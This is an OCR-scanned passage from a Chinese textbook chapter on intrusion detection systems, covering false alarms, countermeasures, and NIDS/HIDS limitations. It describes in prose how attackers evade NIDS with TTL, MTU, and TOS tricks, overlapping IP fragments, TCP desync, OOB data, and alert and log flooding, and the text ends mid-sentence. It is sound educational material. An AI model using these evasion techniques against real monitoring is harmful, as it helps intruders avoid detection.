新 的 攻击 方法 产生 和 新 漏洞 发 布 的 形势 ,攻击 特征 库 不 能 及 时 更 新 是 造成 IDS 漏 报 的 一 大 
原因 。 而 基于 异常 发 现 的 IDS 通过 流量 统计 分 析 , 建 立 系统 正常 行为 的 轨迹 , 当 系统 运行 
时 的 数值 超过 正常 阔 值 , 则 被 认为 可 能 受到 攻击 ,该 技术 本 身 就 导致 了 其 漏 报 误 报 率 提 高 。 
另外 ,大 多 数 的 IDS 是 基于 单 包 检查 的 ,协议 分 析 得 不 够 ,因此 无 法 识别 伪装 或 变形 的 网 络 
攻击 ,也 造成 大 量 漏 报 和 误 报 。 


1043 如 何 提高 系统 的 互动 性 能 


在 大 型 网 络 中 ,网 络 的 不 同 部 分 可 能 使 用 了 多 种 入 侵 检 测 系 统 , 甚 至 还 有 防火 墙 . 漏 
洞 扫 描 等 其 他 类 别 的 安全 设备 ,这 些 入 侵 检测 系统 之 间 以 及 IDS 和 其 他 安全 组 件 之 间 如 
何 交 换 信息 ,共同 协作 来 发 现 攻 击 、 做 出 响应 并 阻止 攻击 是 关系 整个 系统 安全 性 的 重要 
因素 。 例 如 ,漏洞 扫描 程序 例 行 的 试探 攻击 就 不 应 该 触发 IDS 而 报警 ; 而 利用 伪造 的 源 
地 址 进行 攻击 ,就 可 能 导致 防火 墙 关闭 服务 从 而 导致 拒绝 服务 ,这 也 是 互动 系统 需要 考 
虑 的 问题 。 
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10.5 IDS 的 误 报 、 误 警 与 安全 管理 


目前 ,人 们 对 IDS 最 大 的 不 满 很 可 能 就 是 误 报 。 从 技术 方面 上 讲 , 误 报 就 是 指 检测 算 
法 将 正常 的 网 络 数据 当成 了 攻击 。 但 实际 上 用 户 所 认为 的 误 报 就 是 误 警 。 


105.1 IDS 误 报 的 典型 情况 


误 报 很 显然 是 IDS 产品 将 正常 的 网 络 数 据 当 成 了 攻击 ,用 户 经 常会 面 对 大 量 的 警告 而 
茫然 不 知 所 措 ,长 此 以 往 用 户 只 有 两 种 选择 ,一 种 是 忽略 所 有 警告 , 另 一 种 则 是 关闭 IDS。 

然而 ,问题 并 不 总 是 出 在 IDS 设备 上 , 误 报 的 产生 也 取决 于 用 户 如 何 配置 IDS 工具 。 
如 果 配 置 得 当 , 则 报警 信息 能 够 比较 准确 地 反映 出 网 络 中 的 问题 。 如 果 用 户 打 开 了 所 有 的 
(监控 ) 功 能 , 则 会 造成 数据 泛滥 ,难以 正常 监控 。 

但 实际 情况 更 加 复杂 。 两 个 不 同 的 机 构 由 于 站 点 配置 不 同 , 对 同一 产品 的 误 报 的 评价 
也 不 同 。 当 用 户 在 一 个 没有 人 使 用 IE 的 网 络 中 发 现 了 IE 流量 (说 明 误 报 存在 ), 用 户 同时 
对 一 个 开放 研究 网 和 一 个 校园 网 中 进行 观察 ,得 出 的 结论 是 完全 不 同 的 。 

造成 误 报 与 误 警 的 认识 误区 的 一 个 重要 原因 是 IDS 所 能 报告 的 不 只 是 攻击 ,而 是 报告 
网 络 的 一 切 情况 。 例 如 ,IDS 能 够 报告 TCP 连接 的 建立 ,HTTP 请 求 的 URL, 而 这 些 都 是 
攻击 。IDS 为 什么 要 报告 这 些 可 能 不 存在 攻击 的 事件 呢 ? 因为 通过 对 这 些 事件 的 统计 和 分 
析 , 有 时 是 能 够 在 这 些 网 络 事件 中 发 现 攻击 迹象 的 。 这 也 反映 了 IDS 的 局 限 性 , 即 它 不 可 
能 百分之百 精确 地 报告 攻击 ,有 时 还 需要 人 脑 的 经 验 。 


10.52 解决 误 报 和 误 警 问题 的 对 策 


解决 误 报 和 误 警 的 对 策 有 很 多 ,主要 有 以 下 几 种 方法 。 

加 将 基于 异常 的 技术 和 传统 的 基于 特征 的 技术 相 结合 : 当今 最 好 的 异常 检测 工具 也 
只 有 大 约 75% 的 成 功率 。 因 此 ,几乎 没有 客户 能 清楚 地 了 解 其 网 络 运 作 情 况 。 如 果 总 是 给 
客户 的 产品 提供 不 可 靠 的 数据 ,那么 客户 最 终 将 完全 放弃 该 产品 。 

@ 将 协议 分 析 技 术 和 传统 的 基于 特征 的 技术 相 结 合 : 在 检测 攻击 的 大 量 模 式 和 方法 
的 基础 上 ,用 户 将 协议 分 析 技 术 、 模 式 匹配 和 其 他 一 些 技 术 相 结 合 ,通过 异常 检测 和 一 些 统 
计 门 限 等 指标 来 确定 攻击 行为 的 发 生 。 面 对 不 同 的 情况 ,应 当 从 客户 那里 了 解 哪 种 模式 对 
哪 种 攻击 最 有 效 ,并 进行 试验 ,然后 确定 采用 的 模式 。 

强化 IDS 的 安全 管理 功能 : 前 两 种 改进 方法 的 目标 是 提高 IDS 检测 的 精度 和 速度 。 
检测 系统 “诊断 ”的 速度 和 精确 性 不 断 提高 ,渐渐 具备 了 防御 功能 ,进而 又 演变 为 一 种 集中 式 
的 决策 支持 系统 。 今 后 IDS 将 淡化 防御 职能 ,强化 管理 职能 ,淡化 入 侵 防 御 , 强 化 入 侵 管 
理 。 用 户 需要 建立 一 个 不 断 掌握 企业 总 体 安 全 漏洞 状况 的 决策 支持 系统 。 

为 了 强化 IDS 的 安全 管理 职能 ,需要 做 以 下 准备 工作 。 


1. 各 种 报警 信息 进行 集成 


为 了 强化 IDS 的 安全 管理 功能 ,需要 对 各 种 报警 信息 进行 集成 。 这 在 技术 上 完全 可 
行 , 当 用 户 看 到 入 侵 检测 传感器 技术 在 后 台 收 集 数据 方面 的 改进 后 ,将 数据 收集 功能 和 入侵 
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检测 基础 架构 更 紧密 地 集成 在 一 起 。 

目前 的 情况 却 是 由 于 只 有 大 量 零 散 的 数据 ,用 户 得 花 时 间 去 理解 数据 的 含义 。 如 果 能 
够 将 来 自 不 同类 型 传感器 平台 的 数据 收集 起 来 ,并 通过 智能 化 的 手段 集成 这 些 数据 ,用 户 就 
可 以 将 多 个 小 型 事件 综合 成 一 幅 大 型 “图 片 ”。 

现在 IDS 已 经 发 展 到 了 一 定 的 阶段 ,很 显然 ,下 一 阶段 的 工作 是 全 方位 的 管理 。 很 多 
机 构 将 注意 力 集中 在 管理 事件 并 发 掘 其 相关 性 上 。 这 已 不 是 单纯 的 IDS, 它 不 仅 关注 入 侵 
检测 ,而 且 着 眼 于 漏洞 评估 。IDS 需要 确定 系统 是 否 存在 漏洞 ,以 及 这 些 漏 洞 之 间 是 否 存在 
关联 。 在 获取 了 评估 所 需 的 各 组 成 部 分 (数据 ) 后 ,将 是 产生 漏洞 信息 。 这 涉及 到 与 漏洞 评 
估 工 具 ( 如 扫描 器 ) 的 集成 。 

现在 ,一 个 比较 大 的 不 利 因素 是 缺乏 标准 。 这 完全 可 以 理解 ,因为 这 一 领域 发 展 得 太 迅 
速 了 。 现 在 有 很 多 产品 都 可 以 产生 报警 ,每 种 产品 的 实现 方式 都 存在 细微 的 差异 ,因而 人 们 
希望 能 够 有 一 种 集成 的 方式 来 解决 如 何 将 NFR 的 数据 格式 (layout) 映 射 成 ISS 的 数据 格式 ， 
如 何 将 Snort 的 数据 格式 映射 成 Cisco 的 数据 格式 的 问题 。 而 这 本 身 就 是 一 个 棘手 的 问题 。 


2. 需要 与 入 侵 防御 形成 互动 


为 了 强化 IDS 的 安全 管理 功能 ,还 需要 与 人 侵 防御 形成 互动 。 当 用 户 在 使 用 入 侵 防 护 
系统 时 ,如 果 一 种 功能 失效 ,可 以 通过 其 他 功能 弥补 。 入 侵 防御 将 成 为 整个 防御 系统 的 另 一 
个 重要 方面 。 

一 个 有 用 的 举措 是 安全 设备 的 集成 。 因 此 ,用 户 将 看 到 IDS 和 防火 墙 之 间 的 联系 越 来 
越 紧密 ,就 像 VPN 已 经 开始 向 防火 墙 靠拢 一 样 。 如 果 这 些 服务 拥 绑 在 一 起 ,就 意味 着 它们 
可 以 协同 工作 , 当 IDS 检测 到 事件 发 生 时 ,将 自动 通知 防火 墙 实施 相应 策略 。 但 是 要 做 到 
这 一 点 ,用 户 必须 将 误 报 率 降 至 最 低 。 

总 之 ,IDS 的 误 报 和 误 警 是 不 可 能 彻底 解决 的 ,这 个 问题 对 IDS 的 方向 的 影响 就 是 必须 要 
走强 化 安全 管理 功能 的 道路 , 即 强 化 对 多 种 安全 信息 的 收集 功能 ,提高 IDS 的 智能 化 分 析 和 报 
告 能 力 , 与 多 种 安全 产品 形成 配合 。 只 有 这 样 ,IDS 才 有 可 能 成 为 网 络 安 全 的 重要 基础 设施 。 


10.6 入 侵 检 测 系 统 的 弱点 和 局 限 


一 般 来 说 ,IDS 可 分 为 基于 主机 的 IDS (Host Intrusion Delection System, HIDS) 和 基 
于 网 络 的 IDS (Network Intrusion Delection System,NIDS) 。NIDS 往往 以 系统 日 志 、 应 用 
程序 日 志 等 作为 数据 源 ,当然 也 可 以 通过 其 他 手段 (如 监控 系统 调用 ) 从 所 在 的 主机 收集 信 
息 进 行 分 析 。NIDS 则 通过 对 网 络 上 得 到 的 数据 包 进 行 分 析 , 从 而 检测 和 识别 出 系统 中 的 
未 授权 或 异常 现象 。 下 面 首 先 对 NIDS 所 处 的 网 络 局 限 进行 分 析 。 


1061 网 络 局 限 
入 侵 检测 的 网 络 局 限 性 包括 以 下 几 点 : 
1. 交换 网 络 环境 
由 于 共享 式 hub 可 以 进行 网 络 监听 ,给 网 络 安全 带 来 极 大 的 威胁 ,因此 现在 的 网 络 , 万 
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其 是 高 速 网 络 基本 上 都 采用 交换 机 ,从 而 给 NIDS 的 网 络 监听 带 来 麻烦 。 

(1) 监听 端口 

因为 现在 较 好 的 交换 机 都 支持 监听 端口 ,所 以 很 多 NIDS 都 连接 到 端口 上 监听 。 

通常 连接 到 交换 机 时 都 是 全 双 工 的 , 即 在 100MB 的 交换 机 上 双向 流量 可 能 达到 
200MB, 但 监听 端口 的 流量 最 多 达到 100MB, 从 而 导致 交换 机 丢 包 。 

为 了 节省 交换 机 端口 ,很 可 能 配置 为 一 个 交换 机 端口 监听 多 个 其 他 端口 ,在 正常 的 流量 
下 ,监听 端口 能 够 全 部 监听 ,但 在 受到 攻击 的 时 候 , 网 络 流量 可 能 加 大 ,从 而 使 被 监听 的 端口 
流量 总 和 超过 监听 端口 的 上 限 ,引起 交换 机 丢 包 。 

一 般 的 交换 机 在 负载 较 大 的 时 候 , 监 听 端 口 的 速度 小 于 其 他 端口 的 速度 ,从 而 导致 交换 
机 丢 包 。 

增加 监听 端口 即 意味 着 需要 更 多 的 交换 机 端口 ,这 就 需要 购买 额外 的 交换 机 ,其 至 修改 
网 络 结构 (例如 原来 在 一 台 交 换 机 上 的 一 个 VLAN 现在 需要 分 布 到 两 台 交 换 机 上 )。 

支持 监听 的 交换 机 比 不 支持 监听 的 交换 机 要 贵 许多 ,很 多 网 络 在 设计 时 并 没有 考虑 到 
网 络 监 听 的 需求 ,购买 的 交换 机 并 不 支持 网 络 监 听 , 或 者 监听 性 能 不 好 ,从 而 在 准备 安装 
NIDS 的 时 候 需 要 更 换 支持 监听 的 交换 机 。 

(2) 共享 式 集线器 

在 需要 监听 的 网 线 中 连接 一 个 共享 式 集线器 (hub) ,从 而 实现 监听 的 功能 。 对 于 小 公 
司 而 言 ,在 公司 与 Internet 之 间 放 置 一 个 NIDS, 是 一 个 相对 廉价 且 比较 容易 实现 的 方案 。 
采用 hub ,将 导致 主机 的 网 络 连接 由 全 双 工 变 为 半 双 工 , 如 果 NIDS 发 送 的 数据 通过 此 hub 
的 话 ,将 增加 冲突 的 可 能 。 

(3) 线 缆 分 流 

采用 特殊 的 设备 ,连接 到 支持 监听 的 交换 机 上 ,NIDS 再 连接 到 此 交换 机 上 。 这 种 方案 
不 会 影响 现 有 的 网 络 系统 ,但 需要 增加 交换 机 ,并 且 面 临 与 监听 端口 同样 的 问题 。 


2. 网 络 拓扑 局 限 


对 于 一 个 较 复杂 的 网 络 而 言 ,通过 特殊 的 发 包 方式 ,可 以 导致 NIDS 与 受 保护 主机 收 到 
的 包 的 内 容 或 者 顺序 不 一 样 ,从 而 绕 过 NIDS 的 监测 。 

(1) 其 他 路 由 

由 于 一 些 非 技术 的 因素 ,可 能 存在 其 他 的 路 由 ,可 以 绕 过 NIDS 到 达 受 保护 主机 (例如 
某 个 被 忽略 的 modem ,但 modem 旁 没 有 安装 NIDS) 。 

如 果 IP 源 路 由 选项 允许 的 话 , 可 以 通过 精心 设计 IP 路 由 绕 过 NIDS。 

TTL 

如 果 数 据 包 到 达 NIDS 与 受 保护 主机 的 HOP 数 不 一 样 。 则 可 以 通过 精心 设置 TTL 
值 来 使 某 个 数据 包 只 能 被 NIDS 或 者 受 保护 主机 收 到 ,从 而 使 NIDS 的 Sensor 与 受 保护 主 
机 收 到 的 数据 包 不 一 样 ,从 而 绕 过 NIDS 的 监测 。 

(3) MTU 

如 果 MTU 与 受 保护 主机 的 MTU 不 一 致 (由 于 受 保护 的 主机 各 种 各 样 ,其 MTU 设置 
也 不 一 样 ), 则 可 以 精心 设置 MTU 处 于 两 者 之 间 , 并 设置 此 包 不 可 分 片 ,从 而 使 NIDS 的 
Sensor 与 受 保 护 主机 收 到 的 数据 包 不 一 样 , 从 而 绕 过 NIDS 的 监测 。 
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(4) TOS 

有 些 网 络 设备 会 处 理 TOS 选项 ,如 果 NIDS 与 受 保护 主机 各 自 连 接 的 网 络 设备 处 理 方 
法 不 一 样 , 则 可 以 通过 精心 设置 TOS 选项 ,使 NDIS 的 Sensor 与 受 保护 主机 收 到 的 数据 包 
的 顺序 不 一 样 ,于 是 就 有 可 能 导致 NIDS 重组 后 的 数据 包 与 受 保护 主机 的 数据 包 不 一 致 ,从 
而 绕 过 NIDS 的 监测 (尤其 在 UDP 包 中 )。 


1062 检测 方法 的 局 限 性 


NIDS 常用 的 检测 方法 有 特征 检测 、 异 常 检测 、 状 态 检 测 和 协议 分 析 等 。 实 际 的 商用 入 
侵 检测 系统 大 都 同时 采用 几 种 检测 方法 。 

NIDS 不 能 处 理 加 密 后 的 数据 ,如 果 数 据 传输 中 被 加 密 , 即 使 只 是 简单 的 蔡 换 ,NIDS 也 
难以 处 理 , 例 如 采用 SSH HTTPS 和 带 密码 的 压缩 文件 等 手段 .都 可 以 有 效 地 防止 NIDS 
的 检测 。 

NIDS 难以 检测 重 放 攻击 .中间人 攻击 ,对 网 络 监听 也 无 能 为 力 。 目 前 的 NIDS 还 难以 
有 效 地 检测 DDoS 攻击 。 


1. 系统 实现 局 限 


由 于 受 NIDS 保护 的 主机 及 其 运行 的 程序 各 种 各 样 ,甚至 对 同一 个 协议 的 实现 也 不 尽 
相同 ,入 侵 者 可 能 利用 不 同系 统 的 不 同 实现 的 差异 来 进行 系统 信息 收集 (例如 Nmap 通过 
TCP/IP 指纹 来 对 操作 系统 的 识别 ) 或 者 进行 选择 攻击 ,由 于 NIDS 不 能 解析 这 些 系统 的 不 
同 实现 方式 ,故而 可 能 被 入 侵 者 绕 过 。 


2. 异常 检测 的 局 限 


异常 检测 通常 采用 统计 方法 来 进行 检测 。 异 常 检测 需要 大 量 的 原始 的 审计 记录 ,一 个 
纯粹 的 统计 入 侵 检 测 系统 会 忽略 那些 不 会 或 很 少 产生 影响 统计 规律 的 审计 记录 的 入 侵 , 即 
使 它 具 有 很 明显 的 特征 。 

统计 方法 可 以 被 训练 以 适应 入 侵 模 式 。 当 入 侵 者 知道 自己 的 活动 被 监视 时 ,入 侵 者 
可 以 研究 统计 入 侵 检 测 系统 的 统计 方法 ,并 在 该 系统 能 够 接受 的 范围 内 产生 和 审计 事件 ， 
逐步 训练 人 侵 检 测 系 统 , 从 而 使 其 相应 的 活动 偏离 正常 范围 ,最 终 将 入 侵 事 件 作 为 正常 


事件 对 待 。 
应 用 系统 越 来 越 复杂 ,很 多 主体 活动 很 难以 简单 的 统计 模型 来 刻画 ,而 复杂 的 统计 模型 
在 计算 量 上 不 能 满足 实时 的 检测 要 求 。 


统计 方法 中 的 国 值 难以 有 效 确定 , 太 小 的 值 会 产生 大 量 的 误 报 , 太 大 的 值 会 产生 大 量 的 
漏 报 ,例如 系统 中 配置 为 每 秒 200 个 半 开 TCP 连接 为 SYN-Flooding, 则 入 侵 者 每 秒 建立 
199 个 半 开 连接 将 不 会 被 视 为 攻击 。 

异常 检测 常用 于 对 端口 扫描 和 DoS 攻击 的 检测 。NIDS 存在 一 个 流量 日 志 的 上 限 , 如 
果 扫 描 间隔 超过 这 个 上 限 ,NIDS 将 忽略 掉 这 个 扫描 。 

尽管 NIDS 可 以 将 这 个 上 限 配 置 得 很 长 ,但 此 配置 越 长 ,对 系统 资源 要 求 越 多 ,受到 针 
对 NIDS 的 DoS 攻击 的 可 能 性 就 越 大 。 
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3. 特征 检测 的 局 限 


检测 规则 的 更 新 总 是 落后 于 攻击 手段 的 更 新 。 目 前 而 言 ,一 个 新 的 漏洞 在 互联 网 上 公 
布 ,第 二 天 就 有 可 能 在 网 上 找到 用 于 攻击 的 方法 和 代码 ,但 相应 的 检测 规则 还 需要 好 几 天 才 
能 总 结 出 来 。 存 在 一 个 发 现 新 入 侵 方法 到 用 户 升级 规则 库 /知识 库 的 时 间 差 ,对 有 心 的 入侵 
者 ,将 会 有 充足 的 时 间 进 行人 侵 。 

很 多 公布 的 攻击 并 没有 总 结 出 相应 的 检测 规则 或 者 其 检测 规则 误 报 率 很 高 。 并 且 , 现 
在 越 来 越 多 的 黑客 倾向 于 不 公布 他 们 发 现 的 漏洞 ,从 而 很 难 总 结 出 这 些 攻击 的 攻击 特征 。 

目前 新 的 规则 的 整理 主要 由 志愿 者 或 者 厂家 完成 ,用 户 可 以 自行 下 载 使 用 ,用 户 自 定义 
的 规则 实际 上 很 少 ,这 种 情况 在 方便 用 户 的 同时 ,也 方便 了 入 侵 者 ,入 侵 者 可 以 先 检查 所 有 
的 规则 ,然后 采用 不 会 被 检测 到 的 手段 来 进行 人 侵 ,大 大 降低 了 被 NIDS 发 现 的 概率 。 

目前 总 结 出 的 规则 主要 针对 网 络 上 公布 的 黑客 工具 或 者 方法 ,但 对 于 很 多 以 源 代码 发 
布 的 黑客 工具 而 言 , 很 多 入 侵 者 可 以 对 源 代码 进行 简单 的 修改 (例如 黑客 经 常 修改 特洛伊 木 
马 的 代码 ) ,产生 攻击 方法 的 变 体 ,就 可 以 绕 过 NIDS 的 检测 。 


4. 协议 局 限 


对 于 应 用 层 ,一 般 的 NIDS 只 简单 地 处 理 了 常用 的 如 HTTP、FTP 和 SMTP 等 协议 ,还 
有 大 量 的 协议 没有 处 理 ,也 不 可 能 全 部 处 理 , 而 针对 一 些 特殊 协议 或 者 用 户 自 定义 协议 的 攻 
击 , 都 能 绕 过 NIDS 的 检查 。 


5. TCP/IP 协议 局 限 


由 于 TCP/IP 设计 当初 并 没有 很 好 地 考虑 安全 性 ,所 以 现在 的 IPv4 的 安全 性 令 人 担 
忧 ,除了 上 面 的 由 于 网 络 结构 引起 的 问题 外 ,还 有 下 面 的 一 些 局 限 性 问题 。 

(1) IP 分 片 

将 数据 包 分 片 ,有 些 NIDS 不 能 对 IP 分 片 进行 重组 ,或 者 超过 了 其 处 理 能 力 , 则 可 以 绕 
过 NIDS。 

一 个 IP 数据 报 最 多 可 分 为 8192 个 分 片 ,NIDS 的 一 个 性 能 参数 即 为 能 重组 的 最 大 IP 
分 片 数 。 

NIDS 每 接收 到 一 个 新 的 IP 数据 报 的 IP 分 片 ,就 启动 一 个 分 片 重组 过 程 ,在 重组 完成 
或 者 超时 后 (一 般 为 15s) ,关闭 此 重组 过 程 , NIDS 的 一 个 性 能 参数 即 为 能 同时 重组 的 IP 
包 数 。 

一 个 IP 数据 报 的 最 大 为 64KB, 为 接收 一 个 IP 数据 报 , NIDS 将 准备 足够 的 内 存 来 容 
纳 所 有 的 后 续 分 片 ,NIDS 的 一 个 性 能 参数 即 为 能 进行 重组 的 最 大 的 IP 数据 报 的 长 度 。 

结合 上 面 的 三 个 参数 , 即 为 NIDS 在 超时 时 间 ( 例 如 15s) 内 能 同时 准备 进行 最 大 值 ( 例 
如 64KB) 的 IP 数据 报 重组 的 数目 。 如 果 NIDS 接收 到 的 数据 包 超过 上 述 的 极限 ,NIDS 将 
不 得 不 丢 包 ,从 而 发 生 DoS 攻击 。 

(2) IP 重合 分 片 

在 重组 IP 包 分 片 的 时 候 , 如 果 碰 到 重 又 分 片 的 情况 ,各 个 操作 系统 的 处 理 方法 是 不 一 
样 的 ,例如 有 些 系统 会 采用 先 收 到 的 分 片 (Windows 和 Solaris) ,有些 会 采用 后 收 到 的 分 片 
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(BSD 和 Linux) ,如 果 重 又 分 片 的 数据 不 一 样 , 而 NIDS 的 处 理 方 式 也 与 受 保护 主机 的 处 理 
方式 不 一 样 ,就 会 导致 NIDS 重组 后 的 数据 包 与 受 保护 主机 的 数据 包 不 一 致 ,从 而 绕 过 
NIDS 的 检测 。 

例如 可 以 通过 重 到 TCP 或 UDP 的 目的 端口 ,渗透 绝 大 多 数 的 防火 墙 , 并 绕 过 NIDS 的 
检测 。 还 可 以 重 琶 TCP 的 标志 位 ,使 NIDS 不 能 正确 检测 到 TCP 的 FIN 包 , 从 而 使 NIDS 
很 快 达到 能 够 同时 监控 的 TCP 连接 数 的 上 限 ; 或 者 使 NIDS 不 能 正确 检测 到 TCP 的 SYN 
包 , 从 而 使 NIDS 检测 不 到 应 有 的 TCP 连接 。 

(3) TCP 分 段 

如 果 NIDS 不 能 进行 TCP 分 段 重组 , 则 可 以 通过 TCP 分 段 来 绕 过 NIDS。 一 些 异常 的 
TCP 分 段 将 导致 NIDS 检测 失败 。 

(4) TCP un-sync 

在 TCP 中 发 送 错误 的 序列 号 .重复 的 序列 号 ,颠倒 发 送 顺序 等 , 均 有 可 能 绕 过 NIDS。 

(5) OOB(out of band) 

攻击 者 发 送 OOB 数据 ,如 果 受 保护 主机 的 应 用 程序 可 以 处 理 OOB, 由 于 NIDS 不 可 能 
准确 地 预测 受 保护 主机 收 到 OOB 的 时 候 缓冲 区 内 正常 数据 的 多 少 ,所 以 可 能 绕 过 NIDS。 

有 些 系统 在 处 理 OOB 的 时 候 ,会 丢弃 开始 的 1 字 节 数据 (例如 Linux 下 的 Apache, 但 
IIS 不 会 ), 因 此 黑客 通过 在 发 送 的 多 个 TCP 段 中 ,包含 带 OOB 选项 的 TCP 段 ,就 会 导致 
NIDS 重组 后 的 数据 与 受 保护 主机 的 应 用 程序 收 到 的 数据 不 一 致 ,从 而 绕 过 NIDS。 


1063 资源 及 处 理 能 力 局 限 
1. 大 流量 冲击 


攻击 者 向 被 保护 网 络 发 送 大 量 的 数据 ,超过 NIDS 的 处 理 能 力 极限 ,就 会 发 生 丢 包 的 情 
况 , 从 而 导致 人 侵 行为 漏 报 。 

NIDS 的 网 络 抓 包 能 力 与 很 多 因素 有 关 。 例 如 在 每 个 包 1500 比特 的 情况 下 ,NIDS 将 
超过 100MB/s 的 处 理 能 力 ,甚至 达到 超过 500MB/s 的 处 理 能 力 ,但 如 果 每 个 包 只 有 50 比 
特 , 而 100MB/s 的 流量 意味 每 秒 要 抓 二 百 万 个 包 , 这 将 超过 目前 绝 大 多 数 网 卡 及 交换 机 的 
处 理 能 力 。 


2. IP 碎片 攻击 


攻击 者 向 被 保护 网 络 发 送 大 量 的 IP 碎片 (例如 Targa3 攻击 ) ,超过 NIDS 同时 重组 IP 
碎片 的 能 力 , 从 而 导致 通过 IP 分 片 技术 进行 的 攻击 漏 报 。 


3. TCP Connect Flooding 


攻击 者 创建 或 者 模拟 出 大 量 的 TCP 连接 (可 以 通过 上 面 介 绍 的 IP 重 和 至 分 片 等 方法 )， 
超过 NIDS 能 同时 监控 的 TCP 连接 数 的 上 限 , 从 而 导致 多 余 的 TCP 连接 不 能 被 监控 到 。 


4. Alert Flooding 


攻击 者 可 以 参照 网 络 上 公布 的 检测 规则 ,在 攻击 的 同时 故意 发 送 大 量 的 会 引起 NIDS 
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报警 的 数据 (例如 Stick 攻击 ) ,从 而 超过 NIDS 发 送 报警 的 速度 ,导致 漏 报 ,并 且 使 网 络 管理 
员 收 到 大 量 的 报警 ,而 难以 分 辨 出 真正 的 攻击 。 

如 果 发 送 100 比特 便 可 以 产生 一 条 报警 , 则 通过 拨号 上 网 每 秒 就 可 以 产生 50 条 报警 ， 
而 10MB/s 局 域 网 内 每 秒 可 以 产生 10 000 条 报警 。 


5. Log Flooding 


攻击 者 发 送 大 量 的 将 会 引起 NIDS 报警 的 数据 ,最 终 导致 NIDS 用 于 保存 Log 信息 的 
空间 被 耗 尽 ,从 而 删除 先前 的 Log 记录 。 


1064 NIDS 相关 系统 的 脆弱 性 


NIDS 本 身 应 当 具 有 相当 高 的 安全 性 ,一般 用 于 监听 的 网 卡 都 没有 IP 地 址 ,并 且 其 他 
网 卡 不 会 开放 任何 端口 ,但 与 NIDS 相关 的 系统 可 能 会 受到 攻击 。 


1. 控制 台 主 机 的 安全 脆弱 性 


有 些 系统 只 有 单独 的 控制 台 , 如 果 攻 击 者 能 够 控制 控制 台所 在 的 主机 ,就 可 以 对 整个 
NIDS 系统 进行 控制 。 


2. 传感器 与 控制 台 通信 的 脆弱 性 


如 果 传 感 器 与 控制 台 之 间 的 通信 被 攻击 者 成 功 攻击 ,将 会 影响 到 系统 的 正常 使 用 。 例 
如 ,进行 ARP 欺骗 或 者 SYN-Flooding。 
如 果 传 感 器 与 控制 台 间 的 通信 采用 明文 通信 或 者 只 是 简单 的 加 密 , 则 可 能 受到 IP 欺骗 


3. 与 系统 报警 有 关 的 其 他 设备 及 其 通信 的 脆弱 性 
如 果 攻 击 者 能 够 成 功 攻击 与 系统 报警 有 关 的 其 他 设备 ,例如 邮件 服务 器 等 ,也 将 影响 报 
警 消息 的 发 送 。 
1065 HIDS 的 弱点 和 局 限 
1. 资源 局 限 


由 于 HIDS(Host Intrusion Direction System) 安装 在 受 保护 主机 上 , 故 所 占用 的 资源 
不 能 太 多 ,这 样 就 限制 了 所 采用 的 检测 方法 及 处 理性 能 。 


2. 操作 系统 局 限 


与 NIDS 不 同 的 是 ,厂家 可 以 自己 制定 一 个 足够 安全 的 操作 系统 来 保证 NIDS 自身 的 
安全 ,HIDS 的 安全 性 受 其 所 在 主机 的 操作 系统 的 安全 性 限制 ,如 果 所 在 系统 被 攻破 , HIDS 
将 会 被 清除 。 如 果 HIDS 为 单机 , 则 它 只 能 检测 没有 成 功 的 攻击 ,如果 HIDS 为 传感器 / 控 
制 台 结构 , 则 将 面临 与 NIDS 同样 的 对 相关 系统 的 攻击 。 有 些 HIDS 会 考虑 增加 操作 系统 
自身 的 安全 性 (例如 LIDS) 。 
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3. 系统 日 志 局 限 


HIDS 会 通过 监测 系统 日 志 来 发 现 可 疑 的 行为 ,但 有 些 程序 的 系统 日 志 并 不 够 详细 ,或 
者 没有 日 志 。 有 些 入 侵 行 为 本 身 就 不 会 被 具有 系统 日 志 的 程序 记录 下 来 。 

如 果 和 侵 检测 系统 没有 安装 第 三 方 日 志 系统 , 则 入 侵 检测 系统 自身 的 日 志 系 统 很 快 会 
受到 入 侵 者 的 攻击 或 修改 ,而 人 侵 检测 系统 通常 不 支持 第 三 方 的 日 志 系统 。 

如 果 HIDS 没有 实时 检查 系统 日 志 , 则 利用 自动 化 工具 进行 的 攻击 将 会 在 检测 间隔 中 
完成 所 有 的 攻击 并 清除 在 系统 日 志 中 留 下 的 痕迹 。 


4. 文件 检查 局 限 


有 些 入 侵 者 能 够 修改 系统 核心 ,从 而 骗 过 基于 文件 一 致 性 检查 的 工具 。 例 如 某 些 病毒 ， 
当 它 们 认为 受到 检查 或 者 跟踪 的 时 候 会 将 原来 的 文件 和 数据 提供 给 检查 工具 或 者 跟踪 
工具 。 


5. 网 络 检测 局 限 
有 些 HIDS 可 以 用 来 检查 网 络 状态 ,但 这 将 使 它 面临 很 多 和 NIDS 相同 的 问题 。 
1066 NIDS 和 HIDS 的 比较 
1. 部 署 风险 与 成 本 的 比较 


与 基于 主机 的 IDS(Host Intrusion Detection Systems, HIDS) 相 比 ,基于 网 络 的 IDS 
(Network Intrusion Detection Systems,NIDS) 最 大 的 特点 在 于 不 需要 改变 服务 器 的 配置 。 
由 于 不 需要 在 业务 系统 的 主机 中 安装 额外 的 软件 ,因此 ,不 会 影响 这 些 计算 机 的 CPU、1/O 
和 磁盘 等 资源 的 使 用 ,也 不 会 影响 业务 系统 的 性 能 。 另 外 NIDS 不 是 系统 中 的 关键 路 径 , 即 
使 发 生 故 障 也 不 会 影响 正常 业务 的 运行 。 因 此 ,部 署 一 个 NIDS 比 HIDS 的 风险 与 成 本 相 
对 低 一 些 。 


2. 核心 技术 的 比较 


HIDS 技术 要 求 非常 高 .要求 开发 HIDS 的 企业 对 相关 的 操作 系统 非常 了 解 ,而 且 安 装 
在 主机 上 的 探头 (代理 ) 必 须 非常 可 靠 ,系统 资源 占用 小 ,自身 安全 性 要 好 ,和 否则 将 会 对 系统 
产生 负面 的 影响 。HIDS 关注 的 是 到 达 主 机 的 各 种 安全 威胁 ,并 不 关注 网 络 的 安全 。 

NIDS 是 以 网 络 包 作为 分 析 数 据 源 。 它 通过 利用 一 个 工作 在 混杂 模式 下 的 网 卡 来 实现 
监测 并 分 析 通 过 网 络 的 数据 流 , 其 分 析 模 块 通常 使 用 模式 匹配 、 统 计 分 析 等 技术 来 识别 攻击 
行为 。 一 旦 检测 到 了 攻击 行为 ,IDS 的 响应 模块 就 做 出 适当 的 响应 ,如 报警 .切断 相关 用 户 
的 网 络 连接 等 。 与 Scaner 收集 网 络 中 的 漏洞 不 同 , NIDS 收集 的 是 网 络 中 的 动态 流量 信 
息 。 因 此 ,攻击 特征 库 数目 的 多 少 以 及 数据 处 理 能 力 ,就 决定 了 NIDS 识别 人 侵 行 为 的 能 
